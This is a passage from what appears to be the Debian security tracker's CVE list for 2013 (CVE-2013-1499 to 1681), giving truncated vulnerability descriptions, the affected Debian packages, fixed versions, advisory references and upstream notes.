	[squeeze] - iceape
	[wheezy] - iceape
CVE-2013-1681 (Use-after-free vulnerability in the nsContentUtils::RemoveScriptBlocke ...)
	{DSA-2720-1 DSA-2699-1}
	- iceweasel 17.0.6esr-1
	[squeeze] - iceweasel
	- icedove 17.0.7-1
	[squeeze] - icedove
	- iceape
	[squeeze] - iceape
	[wheezy] - iceape
CVE-2013-1680 (Use-after-free vulnerability in the nsFrameList::FirstChild function i ...)
	{DSA-2720-1 DSA-2699-1}
	[squeeze] - iceweasel
	- iceweasel 17.0.6esr-1
	- icedove 17.0.7-1
	[squeeze] - icedove
	- iceape
	[squeeze] - iceape
	[wheezy] - iceape
CVE-2013-1679 (Use-after-free vulnerability in the mozilla::plugins::child::_geturlno ...)
	{DSA-2720-1 DSA-2699-1}
	- iceweasel 17.0.6esr-1
	[squeeze] - iceweasel
	- icedove 17.0.7-1
	[squeeze] - icedove
	- iceape
	[squeeze] - iceape
	[wheezy] - iceape
CVE-2013-1678 (The _cairo_xlib_surface_add_glyph function in Mozilla Firefox before 2 ...)
	{DSA-2720-1 DSA-2699-1}
	- iceweasel 17.0.6esr-1
	[squeeze] - iceweasel
	- icedove 17.0.7-1
	[squeeze] - icedove
	- iceape
	[squeeze] - iceape
	[wheezy] - iceape
CVE-2013-1677 (The gfxSkipCharsIterator::SetOffsets function in Mozilla Firefox befor ...)
	{DSA-2720-1 DSA-2699-1}
	- iceweasel 17.0.6esr-1
	[squeeze] - iceweasel
	- icedove 17.0.7-1
	[squeeze] - icedove
	- iceape
	[squeeze] - iceape
	[wheezy] - iceape
CVE-2013-1676 (The SelectionIterator::GetNextSegment function in Mozilla Firefox befo ...)
	{DSA-2720-1 DSA-2699-1}
	- iceweasel 17.0.6esr-1
	[squeeze] - iceweasel
	- icedove 17.0.7-1
	[squeeze] - icedove
	- iceape
	[squeeze] - iceape
	[wheezy] - iceape
CVE-2013-1675 (Mozilla Firefox before 21.0, Firefox ESR 17.x before 17.0.6, Thunderbi ...)
	{DSA-2720-1 DSA-2699-1}
	- iceweasel 17.0.6esr-1
	[squeeze] - iceweasel
	- icedove 17.0.7-1
	[squeeze] - icedove
	- iceape
	[squeeze] - iceape
	[wheezy] - iceape
CVE-2013-1674 (Use-after-free vulnerability in Mozilla Firefox before 21.0, Firefox E ...)
	{DSA-2720-1 DSA-2699-1}
	- iceweasel 17.0.6esr-1
	[squeeze] - iceweasel
	- icedove 17.0.7-1
	[squeeze] - icedove
	- iceape
	[squeeze] - iceape
	[wheezy] - iceape
CVE-2013-1673 (The Mozilla Updater in Mozilla Firefox before 21.0 on Windows does not ...)
	- iceweasel (Windows build only)
CVE-2013-1672 (The Mozilla Maintenance Service in Mozilla Firefox before 21.0, Firefo ...)
	- iceweasel (Windows build only)
	- icedove (Windows build only)
	- iceape (Windows build only)
CVE-2013-1671 (Mozilla Firefox before 21.0 does not properly implement the INPUT elem ...)
	- iceweasel (Doesn't affect ESR 17 series, only later versions in experimental)
CVE-2013-1670 (The Chrome Object Wrapper (COW) implementation in Mozilla Firefox befo ...)
	{DSA-2720-1 DSA-2699-1}
	- iceweasel 17.0.6esr-1
	[squeeze] - iceweasel
	- icedove 17.0.7-1
	[squeeze] - icedove
	- iceape
	[squeeze] - iceape
	[wheezy] - iceape
CVE-2013-1669 (Multiple unspecified vulnerabilities in the browser engine in Mozilla ...)
	- iceweasel (Only affects Firefox 20)
	- icedove (Only affects Firefox 20)
	- iceape (Only affects Firefox 20)
CVE-2013-1668 (The uploadFile function in upload/index.php in CosCMS before 1.822 all ...)
	NOT-FOR-US: CosCMS
CVE-2013-1667 (The rehash mechanism in Perl 5.8.2 through 5.16.x allows context-depen ...)
	{DSA-2641-1}
	- perl 5.14.2-19 (bug #702296)
	NOTE: http://www.nntp.perl.org/group/perl.perl5.porters/2013/03/msg199755.html
CVE-2013-1666 (Foswiki before 1.1.8 contains a code injection vulnerability in the MA ...)
	- foswiki (bug #509864)
CVE-2013-1665 (The XML libraries for Python 3.4, 3.3, 3.2, 3.1, 2.7, and 2.6, as used ...)
	{DSA-2634-1}
	- keystone 2012.1.1-13 (bug #700948)
	- python-django 1.4.4-1
CVE-2013-1664 (The XML libraries for Python 3.4, 3.3, 3.2, 3.1, 2.7, and 2.6, as used ...)
	- keystone 2012.1.1-13 (bug #700948)
	- nova 2012.1.1-13 (bug #700949)
	- cinder 2012.2.3-1 (bug #700950)
CVE-2013-1663
	RESERVED
CVE-2013-1662 (vmware-mount in VMware Workstation 8.x and 9.x and VMware Player 4.x a ...)
	NOT-FOR-US: VMware
CVE-2013-1661 (VMware ESXi 4.0 through 5.1, and ESX 4.0 and 4.1, does not properly im ...)
	NOT-FOR-US: VMware ESXi
CVE-2013-1660
	REJECTED
CVE-2013-1659 (VMware vCenter Server 4.0 before Update 4b, 5.0 before Update 2, and 5 ...)
	NOT-FOR-US: vCenter
CVE-2013-1658
	RESERVED
CVE-2013-1657
	RESERVED
CVE-2013-1656 (Spree Commerce 1.0.x through 1.3.2 allows remote authenticated adminis ...)
	NOT-FOR-US: Spree
CVE-2013-1655 (Puppet 2.7.x before 2.7.21 and 3.1.x before 3.1.1, when running Ruby 1 ...)
	{DSA-2643-1}
	- puppet 2.7.18-3
CVE-2013-1654 (Puppet 2.7.x before 2.7.21 and 3.1.x before 3.1.1, and Puppet Enterpri ...)
	{DSA-2643-1}
	- puppet 2.7.18-3
CVE-2013-1653 (Puppet before 2.6.18, 2.7.x before 2.7.21, and 3.1.x before 3.1.1, and ...)
	{DSA-2643-1}
	- puppet 2.7.18-3
CVE-2013-1652 (Puppet before 2.6.18, 2.7.x before 2.7.21, and 3.1.x before 3.1.1, and ...)
	{DSA-2643-1}
	- puppet 2.7.18-3
CVE-2013-1651 (OXUpdater in Open-Xchange Server before 6.20.7 rev14, 6.22.0 before re ...)
	NOT-FOR-US: Open-Xchange
CVE-2013-1650 (Open-Xchange Server before 6.20.7 rev14, 6.22.0 before rev13, and 6.22 ...)
	NOT-FOR-US: Open-Xchange
CVE-2013-1649 (Open-Xchange Server before 6.20.7 rev14, 6.22.0 before rev13, and 6.22 ...)
	NOT-FOR-US: Open-Xchange
CVE-2013-1648 (The Subscriptions feature in Open-Xchange Server before 6.20.7 rev14, ...)
	NOT-FOR-US: Open-Xchange
CVE-2013-1647 (Multiple CRLF injection vulnerabilities in Open-Xchange Server before ...)
	NOT-FOR-US: Open-Xchange
CVE-2013-1646 (Multiple cross-site scripting (XSS) vulnerabilities in Open-Xchange Se ...)
	NOT-FOR-US: Open-Xchange
CVE-2013-1645 (Directory traversal vulnerability in Open-Xchange Server before 6.20.7 ...)
	NOT-FOR-US: Open-Xchange
CVE-2013-1644
	RESERVED
CVE-2013-1643 (The SOAP parser in PHP before 5.3.23 and 5.4.x before 5.4.13 allows re ...)
	{DSA-2639-1}
	- php5 5.4.4-14 (bug #702221)
	NOTE: https://git.php.net/?p=php-src.git;a=commitdiff;h=c737b89473df9dba6742b8fc8fbf6d009bf05c36
CVE-2013-1642 (Multiple cross-site scripting (XSS) vulnerabilities in QuiXplorer befo ...)
	NOT-FOR-US: QuiXplorer
CVE-2013-1641 (Directory traversal vulnerability in the zip download functionality in ...)
	NOT-FOR-US: QuiXplorer
CVE-2013-1640 (The (1) template and (2) inline_template functions in the master serve ...)
	{DSA-2643-1}
	- puppet 2.7.18-3
CVE-2013-1639 (Opera before 12.13 does not send CORS preflight requests in all requir ...)
	NOT-FOR-US: Opera
CVE-2013-1638 (Opera before 12.13 allows remote attackers to execute arbitrary code v ...)
	NOT-FOR-US: Opera
CVE-2013-1637 (Opera before 12.13 allows remote attackers to execute arbitrary code v ...)
	NOT-FOR-US: Opera
CVE-2013-1636 (Cross-site scripting (XSS) vulnerability in open-flash-chart.swf in Op ...)
	- biomaj-watcher 1.2.2-1 (low; bug #742859)
	[wheezy] - biomaj-watcher (Minor issue)
CVE-2013-1635 (ext/soap/soap.c in PHP before 5.3.22 and 5.4.x before 5.4.13 does not ...)
	{DSA-2639-1}
	- php5 5.4.4-14 (unimportant; bug #702221)
	NOTE: open_basedir not supported
	NOTE: https://git.php.net/?p=php-src.git;a=commitdiff;h=702b436ef470cc02f8e2cc21f2fadeee42103c74
CVE-2013-1634 (A denial of service vulnerability exists in some motherboard implement ...)
	NOT-FOR-US: Intel
CVE-2013-1633 (easy_install in setuptools before 0.7 uses HTTP to retrieve packages f ...)
	- distribute (unimportant)
	NOTE: Lack of a security feature, not a vulnerability
CVE-2013-1632
	RESERVED
CVE-2013-1631 (Verax NMS prior to 2.1.0 leaks connection details when any user execut ...)
	NOT-FOR-US: Verax NMS
CVE-2013-1630 (pyshop before 0.7.1 uses HTTP to retrieve packages from the PyPI repos ...)
	NOT-FOR-US: pyshop
CVE-2013-1629 (pip before 1.3 uses HTTP to retrieve packages from the PyPI repository ...)
	- python-pip 1.3.1-1 (low; bug #710163)
	[wheezy] - python-pip (Minor issue)
	[squeeze] - python-pip (Minor issue)
	- python-virtualenv 1.9.1-1 (medium; bug #710164)
	[wheezy] - python-virtualenv (Minor issue)
	[squeeze] - python-virtualenv (Minor issue)
CVE-2013-1628
	REJECTED
CVE-2013-1627 (Absolute path traversal vulnerability in NTWebServer.exe in Indusoft S ...)
	NOT-FOR-US: Indusoft Studio, Advantech Studio
CVE-2013-1626
	RESERVED
CVE-2013-1625
	RESERVED
CVE-2013-1624 (The TLS implementation in the Bouncy Castle Java library before 1.48 a ...)
	- bouncycastle 1.48+dfsg-2 (low; bug #699885)
	[squeeze] - bouncycastle (Minor issue)
	[wheezy] - bouncycastle (Minor issue)
CVE-2013-1623 (The TLS and DTLS implementations in wolfSSL CyaSSL before 2.5.0 do not ...)
	{DSA-2780-1}
	- mysql-5.1
	- mysql-5.5 5.5.30+dfsg-1.1 (bug #699886)
	- cyassl (Fixed before initial upload to archive)
	NOTE: cyassl: fixed upstream in 2.5.0
CVE-2013-1622
	REJECTED
CVE-2013-1621 (Array index error in the SSL module in PolarSSL before 1.2.5 might all ...)
	{DSA-2622-1}
	- polarssl 1.1.4-2 (bug #699887)
CVE-2013-1620 (The TLS implementation in Mozilla Network Security Services (NSS) does ...)
	- nss 2:3.14.3-1 (low; bug #699888)
	[squeeze] - nss (Minor issue)
CVE-2013-1619 (The TLS implementation in GnuTLS before 2.12.23, 3.0.x before 3.0.28, ...)
	- gnutls26 2.12.20-4
	[squeeze] - gnutls26 (Too intrusive to backport)
	- gnutls28 3.0.22-3
CVE-2013-1618 (The TLS implementation in Opera before 12.13 does not properly conside ...)
	NOT-FOR-US: Opera
CVE-2013-1617 (Multiple SQL injection vulnerabilities in the management console on th ...)
	NOT-FOR-US: Symantec
CVE-2013-1616 (The management console on the Symantec Web Gateway (SWG) appliance bef ...)
	NOT-FOR-US: Symantec
CVE-2013-1615 (The management console (aka Java console) on the Symantec Security Inf ...)
	NOT-FOR-US: Symantec
CVE-2013-1614 (Multiple cross-site scripting (XSS) vulnerabilities in the management ...)
	NOT-FOR-US: Symantec
CVE-2013-1613 (SQL injection vulnerability in the management console (aka Java consol ...)
	NOT-FOR-US: Symantec
CVE-2013-1612 (Buffer overflow in secars.dll in the management console in Symantec En ...)
	NOT-FOR-US: Symantec
CVE-2013-1611 (Multiple cross-site scripting (XSS) vulnerabilities in administrative- ...)
	NOT-FOR-US: Symantec Brightmail Gateway
CVE-2013-1610 (Unquoted Windows search path vulnerability in RDDService in Symantec P ...)
	NOT-FOR-US: Symantec
CVE-2013-1609 (Multiple unquoted Windows search path vulnerabilities in the (1) File ...)
	NOT-FOR-US: Symantec
CVE-2013-1608 (Directory traversal vulnerability in the Management Console on the Sym ...)
	NOT-FOR-US: Symantec
CVE-2013-1607 (Ruby PDFKit gem prior to 0.5.3 has a Code Execution Vulnerability ...)
	NOT-FOR-US: Ruby PDFKit gem
CVE-2013-1606 (Buffer overflow in the ubnt-streamer RTSP service on the Ubiquiti UBNT ...)
	NOT-FOR-US: Ubiquiti UBNT AirCam
CVE-2013-1605 (Buffer overflow in MayGion IP Cameras with firmware before 2013.04.22 ...)
	NOT-FOR-US: MayGion IP Cameras
CVE-2013-1604 (Directory traversal vulnerability in MayGion IP Cameras with firmware ...)
	NOT-FOR-US: MayGion IP Cameras
CVE-2013-1603 (An Authentication vulnerability exists in D-LINK WCS-1100 1.02, TESCO ...)
	NOT-FOR-US: D-LINK
CVE-2013-1602 (An Information Disclosure vulnerability exists due to insufficient val ...)
	NOT-FOR-US: D-LINK
CVE-2013-1601 (An Information Disclosure vulnerability exists due to a failure to res ...)
	NOT-FOR-US: D-LINK
CVE-2013-1600 (An Authentication Bypass vulnerability exists in upnp/asf-mp4.asf when ...)
	NOT-FOR-US: D-Link
CVE-2013-1599 (A Command Injection vulnerability exists in the /var/www/cgi-bin/rtpd. ...)
	NOT-FOR-US: D-Link
CVE-2013-1598 (A Command Injection vulnerability exists in Vivotek PT7135 IP Cameras ...)
	NOT-FOR-US: Vivotek PT7135 IP Cameras
CVE-2013-1597 (A Directory Traversal vulnerability exists in Vivotek PT7135 IP Camera ...)
	NOT-FOR-US: Vivotek PT7135 IP Cameras
CVE-2013-1596 (An Authentication Bypass Vulnerability exists in Vivotek PT7135 IP Cam ...)
	NOT-FOR-US: Vivotek PT7135 IP Cameras
CVE-2013-1595 (A Buffer Overflow vulnerability exists in Vivotek PT7135 IP Camera 030 ...)
	NOT-FOR-US: Vivotek PT7135 IP Cameras
CVE-2013-1594 (An Information Disclosure vulnerability exists via a GET request in Vi ...)
	NOT-FOR-US: Vivotek PT7135 IP Cameras
CVE-2013-1593 (A Denial of Service vulnerability exists in the WRITE_C function in th ...)
	NOT-FOR-US: SAP
CVE-2013-1592 (A Buffer Overflow vulnerability exists in the Message Server service _ ...)
	NOT-FOR-US: SAP
CVE-2013-1591 (Stack-based buffer overflow in libpixman, as used in Pale Moon before ...)
	- pixman 0.26.0-4 (bug #700308)
	[squeeze] - pixman (Vulnerable code not present)
CVE-2013-1590 (Buffer overflow in the NTLMSSP dissector in Wireshark 1.6.x before 1.6 ...)
	{DSA-2625-1}
	- wireshark 1.8.6-1
	[wheezy] - wireshark 1.8.2-5wheezy1
CVE-2013-1589 (Double free vulnerability in epan/proto.c in the dissection engine in ...)
	- wireshark 1.8.6-1 (unimportant)
	[wheezy] - wireshark 1.8.2-5wheezy1
	NOTE: Not suitable for code injection
CVE-2013-1588 (Multiple buffer overflows in the dissect_pft_fec_detailed function in ...)
	{DSA-2625-1}
	- wireshark 1.8.6-1
	[wheezy] - wireshark 1.8.2-5wheezy1
	NOTE: Upstream bug: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=8213
	NOTE: Upstream patch: http://anonsvn.wireshark.org/viewvc?view=revision&revision=47098
CVE-2013-1587 (The dissect_rohc_ir_packet function in epan/dissectors/packet-rohc.c i ...)
	- wireshark 1.8.6-1
	[squeeze] - wireshark (Vulnerable code not present)
	[wheezy] - wireshark 1.8.2-5wheezy1
	NOTE: Upstream bug: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=7679
	NOTE: Upstream patch: http://anonsvn.wireshark.org/viewvc?view=revision&revision=44700
CVE-2013-1586 (The fragment_set_tot_len function in epan/reassemble.c in Wireshark 1. ...)
	{DSA-2625-1}
	- wireshark 1.8.6-1
	[wheezy] - wireshark 1.8.2-5wheezy1
	NOTE: Upstream bug: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=8111
	NOTE: http://anonsvn.wireshark.org/viewvc?view=revision&revision=46999
	NOTE: http://anonsvn.wireshark.org/viewvc?view=revision&revision=47000
CVE-2013-1585 (epan/tvbuff.c in Wireshark 1.6.x before 1.6.13 and 1.8.x before 1.8.5 ...)
	- wireshark 1.8.6-1
	[squeeze] - wireshark (Vulnerable code not present)
	[wheezy] - wireshark 1.8.2-5wheezy1
	NOTE: Upstream bug: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=8112
	NOTE: http://anonsvn.wireshark.org/viewvc?view=revision&revision=46705
	NOTE: http://anonsvn.wireshark.org/viewvc?view=revision&revision=46678
CVE-2013-1584 (The dissect_version_5_and_6_primary_header function in epan/dissectors ...)
	- wireshark 1.8.6-1
	[squeeze] - wireshark (Vulnerable code not present)
	[wheezy] - wireshark 1.8.2-5wheezy1
	NOTE: Upstream bug: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=7945
	NOTE: http://anonsvn.wireshark.org/viewvc?view=revision&revision=46579
CVE-2013-1583 (The dissect_version_4_primary_header function in epan/dissectors/packe ...)
	- wireshark 1.8.6-1
	[squeeze] - wireshark (Vulnerable code not present)
	[wheezy] - wireshark 1.8.2-5wheezy1
	NOTE: Upstream bug: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=7945
	NOTE: http://anonsvn.wireshark.org/viewvc?view=revision&revision=46577
CVE-2013-1582 (The dissect_clnp function in epan/dissectors/packet-clnp.c in the CLNP ...)
	{DSA-2625-1}
	- wireshark 1.8.6-1
	[wheezy] - wireshark 1.8.2-5wheezy1
	NOTE: Upstream bug: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=7871
	NOTE: http://anonsvn.wireshark.org/viewvc?view=revision&revision=45646
CVE-2013-1571 (Unspecified vulnerability in the Javadoc component in Oracle Java SE 7 ...)
	{DSA-2727-1 DSA-2722-1}
	- openjdk-6 6b27-1.12.6-1
	- openjdk-7 7u25-2.3.10-1
CVE-2013-1570 (Unspecified vulnerability in Oracle MySQL 5.6.10 and earlier allows re ...)
	- mysql-5.5 (Only affects MySQL 5.6)
	- mysql-5.1 (Only affects MySQL 5.6)
CVE-2013-1569 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...)
	{DSA-3187-1 DLA-219-1}
	- openjdk-7 7u21-2.3.9-1
	- openjdk-6 6b27-1.12.5-1
	- icu 52.1-1
CVE-2013-1568 (Unspecified vulnerability in the Oracle FLEXCUBE Direct Banking compon ...)
	NOT-FOR-US: Oracle Financial Services Software
CVE-2013-1567 (Unspecified vulnerability in Oracle MySQL 5.6.10 and earlier allows re ...)
	- mysql-5.5 (Only affects MySQL 5.6)
	- mysql-5.1 (Only affects MySQL 5.6)
CVE-2013-1566 (Unspecified vulnerability in Oracle MySQL 5.6.10 and earlier allows re ...)
	- mysql-5.5 (Only affects MySQL 5.6)
	- mysql-5.1 (Only affects MySQL 5.6)
CVE-2013-1565 (Unspecified vulnerability in the Oracle GoldenGate Veridata component ...)
	NOT-FOR-US: Oracle Fusion Middleware
CVE-2013-1564 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...)
	- openjdk-6 (JavaFX not part of OpenJDK)
	- openjdk-7 (JavaFX not part of OpenJDK)
CVE-2013-1563 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...)
	- openjdk-6 (Installation component of Oracle Java doesn't apply to IcedTea/OpenJDK)
	- openjdk-7 (Installation component of Oracle Java doesn't apply to IcedTea/OpenJDK)
CVE-2013-1562 (Unspecified vulnerability in the Oracle FLEXCUBE Direct Banking compon ...)
	NOT-FOR-US: Oracle Financial Services
CVE-2013-1561 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...)
	- openjdk-6 (JavaFX not part of OpenJDK)
	- openjdk-7 (JavaFX not part of OpenJDK)
CVE-2013-1560 (Unspecified vulnerability in the Oracle FLEXCUBE Direct Banking compon ...)
	NOT-FOR-US: Oracle Financial Services
CVE-2013-1559 (Unspecified vulnerability in the Oracle WebCenter Content component in ...)
	NOT-FOR-US: Oracle Fusion Middleware
CVE-2013-1558 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...)
	- openjdk-7 7u21-2.3.9-1
	- openjdk-6 6b27-1.12.5-1
CVE-2013-1557 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...)
	- openjdk-7 7u21-2.3.9-1
	- openjdk-6 6b27-1.12.5-1
CVE-2013-1556 (Unspecified vulnerability in the Oracle FLEXCUBE Direct Banking compon ...)
	NOT-FOR-US: Oracle Financial Services Software
CVE-2013-1555 (Unspecified vulnerability in Oracle MySQL 5.1.67 and earlier, and 5.5. ...)
	{DSA-2780-1}
	- mysql-5.5 5.5.30+dfsg-1
	- mysql-5.1
	- mariadb-10.0 (Fixed before initial upload)
	- mariadb-5.5 (Fixed before initial upload)
CVE-2013-1554 (Unspecified vulnerability in the Network Layer component in Oracle Dat ...)
	NOT-FOR-US: Oracle Database Server
CVE-2013-1553 (Unspecified vulnerability in the Oracle Web Services Manager component ...)
	NOT-FOR-US: Oracle Fusion Middleware
CVE-2013-1552 (Unspecified vulnerability in Oracle MySQL 5.1.67 and earlier and 5.5.2 ...)
	{DSA-2780-1}
	- mysql-5.5 5.5.30+dfsg-1
	- mysql-5.1
	- mariadb-10.0 (Fixed before initial upload)
	- mariadb-5.5 (Fixed before initial upload)
CVE-2013-1551 (Unspecified vulnerability in the Siebel Enterprise Application Integra ...)
	NOT-FOR-US: Oracle Siebel CRM
CVE-2013-1550 (Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools com ...)
	NOT-FOR-US: Oracle PeopleSoft Products
CVE-2013-1549 (Unspecified vulnerability in the Oracle FLEXCUBE Direct Banking compon ...)
	NOT-FOR-US: Oracle Financial Services Software
CVE-2013-1548 (Unspecified vulnerability in Oracle MySQL 5.1.63 and earlier allows re ...)
	{DSA-2780-1}
	- mysql-5.5 (Only affects MySQL 5.1)
	- mysql-5.1
	- mariadb-10.0 (Fixed before initial upload)
	- mariadb-5.5 (Fixed before initial upload)
CVE-2013-1547 (Unspecified vulnerability in the Oracle FLEXCUBE Direct Banking compon ...)
	NOT-FOR-US: Oracle Financial Services Software
CVE-2013-1546 (Unspecified vulnerability in the Oracle FLEXCUBE Direct Banking compon ...)
	NOT-FOR-US: Oracle Financial Services Software
CVE-2013-1545 (Unspecified vulnerability in the Oracle HTTP Server component in Oracl ...)
	NOT-FOR-US: Oracle Fusion Middleware
CVE-2013-1544 (Unspecified vulnerability in Oracle MySQL 5.1.68 and earlier, 5.5.30 a ...)
	{DSA-2780-1 DSA-2667-1}
	- mysql-5.5 5.5.31+dfsg-1
	- mysql-5.1
	- mariadb-10.0 (Fixed before initial upload)
	- mariadb-5.5 (Fixed before initial upload)
CVE-2013-1543 (Unspecified vulnerability in the Siebel UI Framework component in Orac ...)
	NOT-FOR-US: Oracle Siebel CRM
CVE-2013-1542 (Unspecified vulnerability in the Oracle Containers for J2EE component ...)
	NOT-FOR-US: Oracle Fusion Middleware
CVE-2013-1541 (Unspecified vulnerability in the Oracle FLEXCUBE Direct Banking compon ...)
	NOT-FOR-US: Oracle Financial Services
CVE-2013-1540 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...)
	- openjdk-6 (Deployment components not part of OpenJDK, only present in Oracle Java)
	- openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java)
CVE-2013-1539 (Unspecified vulnerability in the Oracle FLEXCUBE Direct Banking compon ...)
	NOT-FOR-US: Oracle Financial Services
CVE-2013-1538 (Unspecified vulnerability in the Network Layer component in Oracle Dat ...)
	NOT-FOR-US: Oracle Database Server
CVE-2013-1537 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...)
	- openjdk-7 7u21-2.3.9-1
	- openjdk-6 6b27-1.12.5-1
CVE-2013-1536 (Unspecified vulnerability in the Oracle Transportation Management comp ...)
	NOT-FOR-US: Oracle Supply Chain Products
CVE-2013-1535 (Unspecified vulnerability in the Oracle FLEXCUBE Direct Banking compon ...)
	NOT-FOR-US: Oracle Financial Services Software
CVE-2013-1534 (Unspecified vulnerability in the Workload Manager component in Oracle ...)
	NOT-FOR-US: Oracle Database Server
CVE-2013-1533 (Unspecified vulnerability in the Oracle FLEXCUBE Direct Banking compon ...)
	NOT-FOR-US: Oracle Financial Services Software
CVE-2013-1532 (Unspecified vulnerability in Oracle MySQL 5.1.68 and earlier, 5.5.30 a ...)
	{DSA-2780-1 DSA-2667-1}
	- mysql-5.5 5.5.31+dfsg-1
	- mysql-5.1
	- mariadb-10.0 (Fixed before initial upload)
	- mariadb-5.5 (Fixed before initial upload)
CVE-2013-1531 (Unspecified vulnerability in Oracle MySQL 5.1.66 and earlier and 5.5.2 ...)
	{DSA-2780-1}
	- mysql-5.5 5.5.30+dfsg-1
	- mysql-5.1
	- mariadb-10.0 (Fixed before initial upload)
	- mariadb-5.5 (Fixed before initial upload)
CVE-2013-1530 (Unspecified vulnerability in Oracle Sun Solaris 10 allows local users ...)
	NOT-FOR-US: Oracle Solaris
CVE-2013-1529 (Unspecified vulnerability in the Oracle WebCenter Interaction componen ...)
	NOT-FOR-US: Oracle Fusion Middleware
CVE-2013-1528 (Unspecified vulnerability in the Oracle HRMS component in Oracle E-Bus ...)
	NOT-FOR-US: Oracle E-Business Suite
CVE-2013-1527 (Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools com ...)
	NOT-FOR-US: Oracle PeopleSoft Products
CVE-2013-1526 (Unspecified vulnerability in Oracle MySQL 5.5.29 and earlier allows re ...)
	- mysql-5.5 5.5.30+dfsg-1
	- mysql-5.1 (Only affects MySQL 5.5)
	- mariadb-10.0 (Fixed before initial upload)
	- mariadb-5.5 (Fixed before initial upload)
CVE-2013-1525 (Unspecified vulnerability in the Oracle Retail Integration Bus compone ...)
	NOT-FOR-US: Oracle Industry Applications
CVE-2013-1524 (Unspecified vulnerability in the Oracle Application Object Library com ...)
	NOT-FOR-US: Oracle E-Business Suite
CVE-2013-1523 (Unspecified vulnerability in Oracle MySQL 5.5.29 and earlier and 5.6.1 ...)
	- mysql-5.5 5.5.30+dfsg-1
	- mysql-5.1 (Only affects MySQL 5.5 and 5.6)
	- mariadb-10.0 (Fixed before initial upload)
	- mariadb-5.5 (Fixed before initial upload)
CVE-2013-1522 (Unspecified vulnerability in the Oracle WebCenter Content component in ...)
	NOT-FOR-US: Oracle Fusion Middleware
CVE-2013-1521 (Unspecified vulnerability in Oracle MySQL 5.1.67 and earlier and 5.5.2 ...)
	{DSA-2780-1}
	- mysql-5.5 5.5.30+dfsg-1
	- mysql-5.1
	- mariadb-10.0 (Fixed before initial upload)
	- mariadb-5.5 (Fixed before initial upload)
CVE-2013-1520 (Unspecified vulnerability in the Oracle Clinical Remote Data Capture O ...)
	NOT-FOR-US: Oracle Industry Applications
CVE-2013-1519 (Unspecified vulnerability in the Application Express component in Orac ...)
	NOT-FOR-US: Oracle Database Server
CVE-2013-1518 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...)
	- openjdk-7 7u21-2.3.9-1
	- openjdk-6 6b27-1.12.5-1
CVE-2013-1517 (Unspecified vulnerability in the Oracle Application Object Library com ...)
	NOT-FOR-US: Oracle E-Business Suite
CVE-2013-1516 (Unspecified vulnerability in the Oracle WebCenter Capture component in ...)
	NOT-FOR-US: Oracle Fusion Middleware
CVE-2013-1515 (Unspecified vulnerability in the Oracle GlassFish Server component in ...)
	- glassfish (Only affects 3.x)
CVE-2013-1514 (Unspecified vulnerability in the Oracle Containers for J2EE component ...)
	NOT-FOR-US: Oracle Fusion Middleware
CVE-2013-1513 (Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools com ...)
	NOT-FOR-US: Oracle PeopleSoft Products
CVE-2013-1512 (Unspecified vulnerability in Oracle MySQL 5.5.29 and earlier allows re ...)
	- mysql-5.5 5.5.30+dfsg-1
	- mysql-5.1 (Only affects MySQL 5.5)
	- mariadb-10.0 (Fixed before initial upload)
	- mariadb-5.5 (Fixed before initial upload)
CVE-2013-1511 (Unspecified vulnerability in Oracle MySQL 5.5.30 and earlier and 5.6.1 ...)
	{DSA-2667-1}
	- mysql-5.5 5.5.31+dfsg-1
	- mysql-5.1 (Only affects MySQL 5.5 and 5.6)
	- mariadb-10.0 (Fixed before initial upload)
	- mariadb-5.5 (Fixed before initial upload)
CVE-2013-1510 (Unspecified vulnerability in the Siebel UI Framework component in Orac ...)
	NOT-FOR-US: Oracle Siebel
CVE-2013-1509 (Unspecified vulnerability in the Oracle WebCenter Sites component in O ...)
	NOT-FOR-US: Oracle Fusion
CVE-2013-1508 (Unspecified vulnerability in the Oracle GlassFish Server component in ...)
	- glassfish (Only affects 3.x)
CVE-2013-1507 (Unspecified vulnerability in Oracle Sun Solaris 10 and 11 allows local ...)
	NOT-FOR-US: Solaris
CVE-2013-1506 (Unspecified vulnerability in Oracle MySQL 5.1.67 and earlier, 5.5.29 a ...)
	{DSA-2780-1}
	- mysql-5.5 5.5.30+dfsg-1
	- mysql-5.1
	- mariadb-10.0 (Fixed before initial upload)
	- mariadb-5.5 (Fixed before initial upload)
CVE-2013-1505 (Unspecified vulnerability in the Oracle FLEXCUBE Direct Banking compon ...)
	NOT-FOR-US: Oracle FLEXCUBE
CVE-2013-1504 (Unspecified vulnerability in the Oracle WebLogic Server component in O ...)
	NOT-FOR-US: Oracle Fusion
CVE-2013-1503 (Unspecified vulnerability in the Oracle WebCenter Content component in ...)
	NOT-FOR-US: Oracle Fusion
CVE-2013-1502 (Unspecified vulnerability in Oracle MySQL 5.5.30 and earlier and 5.6.9 ...)
	{DSA-2667-1}
	- mysql-5.5 5.5.31+dfsg-1
	- mysql-5.1 (Only affects MySQL 5.5 and 5.6)
	- mariadb-10.0 (Fixed before initial upload)
	- mariadb-5.5 (Fixed before initial upload)
CVE-2013-1501 (Unspecified vulnerability in the Oracle iStore component in Oracle E-B ...)
	NOT-FOR-US: Oracle E-Business Suite
CVE-2013-1500 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...)
	{DSA-2727-1 DSA-2722-1}
	- openjdk-6 6b27-1.12.6-1
	- openjdk-7 7u25-2.3.10-1
CVE-2013-1499 (Unspecified vulnerability in Oracle Sun Solaris 11 allows local users ...)
	NOT-FOR-US: Solaris
